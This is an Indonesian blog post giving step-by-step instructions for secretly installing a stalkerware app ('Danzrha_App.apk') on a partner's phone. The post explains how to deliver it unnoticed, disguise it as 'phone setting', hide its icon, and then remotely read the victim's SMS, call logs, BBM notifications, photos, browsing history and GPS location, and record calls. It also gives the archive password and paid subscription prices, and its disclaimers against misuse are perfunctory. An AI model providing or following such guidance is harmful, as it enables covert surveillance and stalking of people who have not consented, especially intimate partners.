Pages

Author Info

Site Info

Video Of Day

About the author

Lebih Baik Diasingkan Daripada Menyerah Terhadap Kemunafikan.,,,(GIE)

Cara Menyadap BBM Pacar

Cara Menyadap BBM Pacar

Dalam beberapa hal sifat dalam kehidupan manusia sering kali kita tidak pernah merasa puas apa yang sudah didapatkan dan tidak luput juga dari sifat manusia yang keinginan tahuannya besar seperti mempelajari sesuatu hal dan dijadikan pengalaman sendiri sampai ada yang ingin tau rahasia pribadi orang lain, sebagai contohnya saya sendiri hehehee.
Dalam kesempatan kali ini saya akan postingkan bagaimana cara menyadap BBM, SMS dan telpon orang lain, dan yang pasti tentunya kita juga penasarankan apa yang dilakukan pacar kita jika tidak bersama kita bagaimana kelakuannya, dia BBM-an dengan siapa? SMS-an dengan siapa? atau dia telponan dengan siapa? pas kita cek handphone sipacar BBM dan SMS-nya tidak ada yang mencurigakan, tentunya kita tidak tau kan? Bisa saja semuanya sudah dihapus sama sipacar, eeitts tapi kita jangan su'udzon dulu siapa tau memang benar pacar kamu itu setia tidak pernah BBM atau SMS-an dengan orang lain, mudah-mudahan saja begitu.
Tapi jika kalian tetap penasaran dengan kelakuan sipacar didunia gadget, anda bisa lakukan penyadapan dihandphone sipacar dengan alasan hanya ingin menguji kesetiaannya saja mungkin itu masih diperbolehkan, tapi jika ingin melakukannya demi kejahatan saya tegaskan jangan lakukan itu.
Catatan :
"Harap diingat" Jika anda bersikeras melakukannya untuk kejahatan admin tidak bertanggung jawab atas apa yang akan terjadi jadi disarankan gunakan sebaik-baiknya terimakasih.

Kita lanjut ke pokok pembahasan baca sampai bawah dengan seksama agar tutorial lancar dan sukses, ok kita langsung saja ke tutorialnya dan syarat-syaratnya.
  1. Siapkan kopi dan rokok santai saja relax gan hehee.
  2. Bahan yang anda perlukan download dulu Danzrha_App.apk untuk passwordnya silahkan baca sampai selesai jangan ada yang terlewatkan.
  3. Jika anda mengalami kesulitan membuka file silahkan download ES File Explorer Terbaru.
  4. Selanjutnya anda kirimkan aplikasi Danzrha_App.apk ke smartphone korban yang ingin anda sadap bisa lewat bluetooth atau apa saja yang penting terkirim ke handphone korban, ingat jangan sampai ketahuan oleh sang korban untuk menlancarkan proses penyadapan.
  5. Install aplikasi Danzrha_App.apk dismartphone yang ingin anda sadap, install seperti biasa jika mengalami kesulitan saat pemasangan (Baca : Cara Mengatasi Aplikasi Yang Tidak Terpasang).
  6. Jika sudah terpasang aplikasi akan otomatis bernama phone setting biar tidak mencurigakan.
  7. Jalankan aplikasi lalu isi username, password dan emailnya, isi emailnya dengan email karangan saja yang tidak terdaftar digmail contoh : bebas@gmail.com.
  8. Jika sudah terisi semua klik "active notification backup" dan pilih Ok.
  9. Selanjutnya centang "notificaton service" dan pilih Ok.
  10. Jika sudah kembali ke menu sebelumnya lalu pilih "save and hide this app" lalu pilih ok untuk menyimpan dan menyembunyikan aplikasi.
  11. Jika proses creating account berhasil akan muncul pemberitauan dan aplikasi phone setting pun akan otomatis menghilang kurang lebihnya seperti gambar dibawah ini.
  12. Dan proses penyadapan berhasil selanjutnya kita bisa cek file BBM, SMS dan Telpon dengan smartphone kita.
Nah sekarang langkah-langkah untuk melihat penyadapannya, saya akan kasih contoh dengan smartphone milik saya yang sudah saya sadap sendiri untuk membuktikannya bisa lihat screenshot dibawah ini.
Baca dengan seksama tutorialnya.
  • Pertama anda masih ingatkan username dan passwordnya? jika masih ingat silahkan anda login terlebih dahulu.
  • Setelah login akan ada beberapa menu berikut penjelasannya.
  • Text & Call Logs : Untuk melihat semua SMS dan panggilan masuk.
  • Location : Untuk melihat posisi korban sedang ada dimana dengan syarat handphone korban GPS-nya dalam keadaan aktif untuk melihat fitur ini.
  • Photo : Untuk melihat foto apa saja yang ada dalam galeri handphone korban.
  • Notifications : Pemberitaun BBM masuk dan perintah lainnya seperti korban baru saja mendownload file dari internet laporannya akan ada di menu notifications.
  • Browser : Untuk mengetahui riwayat browsing yang sudah dilakukan korban.
  • Call Recording : Untuk merekam percakapan yang sudah dilakukan lewat telpon.
Untuk tutorial Call Recording saya akan share di artikel selanjutnya.
Saya garis bawahi dan saya tegaskan sekali lagi seperti yang sudah saya katakan diatas jangan gunakan hal ini untuk kejahatan, karna admin tidak akan bertanggung jawab atas apa yang akan terjadi.
Catatan :
Penyadapan ini hanya gratis selama 2 hari jika ingin memperpanjangnya anda bisa membayar biaya dengan paypal sebesar $9,49/Bulan, harga special $39,49/6Bulan $17,45/6Bulan, $69,49/Tahun $44,39/Tahun, jika anda bingung info lengkap silahkan hubungi admin : 575ED972 dan untuk password file aplikasi masukan kata "danzrha"

Tidak ada komentar:

 

Rangkumane

Diberdayakan oleh Blogger.